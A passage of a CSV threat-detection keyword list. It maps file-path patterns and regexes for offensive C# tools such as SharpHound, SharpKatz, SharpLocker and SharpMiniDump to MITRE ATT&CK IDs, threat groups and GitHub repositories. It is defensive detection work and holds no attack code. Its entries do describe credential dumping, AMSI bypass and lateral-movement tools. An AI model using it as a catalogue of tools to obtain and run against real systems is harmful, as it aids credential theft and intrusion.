T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18575" "*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18576" "*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18577" "*\SharpHound.html*",".{0,1000}\\SharpHound\.html.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","18578" "*\SharpHound.pdb*",".{0,1000}\\SharpHound\.pdb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","18579" "*\SharpHound.pdb*",".{0,1000}\\SharpHound\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18580" "*\SharpHound.pdb*",".{0,1000}\\SharpHound\.pdb.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 
- RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","18581" "*\SharpHound.pdb*",".{0,1000}\\SharpHound\.pdb.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18582" "*\SharpHound.ps1*",".{0,1000}\\SharpHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","18583" "*\SharpHoundCommon\*",".{0,1000}\\SharpHoundCommon\\.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","18584" "*\SharpHound-v*.zip*",".{0,1000}\\SharpHound\-v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","18585" "*\SharpIncrease.exe*",".{0,1000}\\SharpIncrease\.exe.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/mertdas/SharpIncrease","1","0","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","18586" "*\SharpIncrease.sln*",".{0,1000}\\SharpIncrease\.sln.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","18587" "*\Sharpire.exe*",".{0,1000}\\Sharpire\.exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","18588" "*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18589" "*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18590" "*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18591" "*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","SharpKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18592" "*\SharpKatz.pdb*",".{0,1000}\\SharpKatz\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18593" "*\SharpKatz.pdb*",".{0,1000}\\SharpKatz\.pdb.{0,1000}","offensive_tool_keyword","SharpKatz","executables for penetration testing Windows Active 
Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18594" "*\Sharp-Killer.sln*",".{0,1000}\\Sharp\-Killer\.sln.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","18595" "*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18596" "*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18597" 
"*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18598" "*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","SharpLAPS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18599" "*\SharpLAPS.pdb*",".{0,1000}\\SharpLAPS\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18600" "*\SharpLAPS.pdb*",".{0,1000}\\SharpLAPS\.pdb.{0,1000}","offensive_tool_keyword","SharpLAPS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18601" "*\SharpLDAP\*",".{0,1000}\\SharpLDAP\\.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","18602" "*\SharpLocker.csproj*",".{0,1000}\\SharpLocker\.csproj.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","18603" "*\SharpLocker.exe*",".{0,1000}\\SharpLocker\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18604" "*\SharpLocker.exe*",".{0,1000}\\SharpLocker\.exe.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","18605" "*\SharpLocker-master*",".{0,1000}\\SharpLocker\-master.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","18606" "*\SharpLogger.exe*",".{0,1000}\\SharpLogger\.exe.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","18607" "*\Sharpmad.exe*",".{0,1000}\\Sharpmad\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18608" "*\Sharpmad.exe*",".{0,1000}\\Sharpmad\.exe.{0,1000}","offensive_tool_keyword","Sharpmad","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18609" "*\Sharpmad.pdb*",".{0,1000}\\Sharpmad\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18610" "*\Sharpmad.pdb*",".{0,1000}\\Sharpmad\.pdb.{0,1000}","offensive_tool_keyword","Sharpmad","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18611" 
"*\SharpMapExec.exe*",".{0,1000}\\SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18612" "*\SharpMapExec.exe*",".{0,1000}\\SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18613" "*\SharpMapExec.exe*",".{0,1000}\\SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","18614" "*\SharpMapExec.sln*",".{0,1000}\\SharpMapExec\.sln.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","18615" "*\SharpMapExec\*",".{0,1000}\\SharpMapExec\\.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","18616" "*\SharpMiniDump.exe*",".{0,1000}\\SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18617" "*\SharpMiniDump.exe*",".{0,1000}\\SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18618" "*\SharpMiniDump-master*",".{0,1000}\\SharpMiniDump\-master.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","18619" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral 
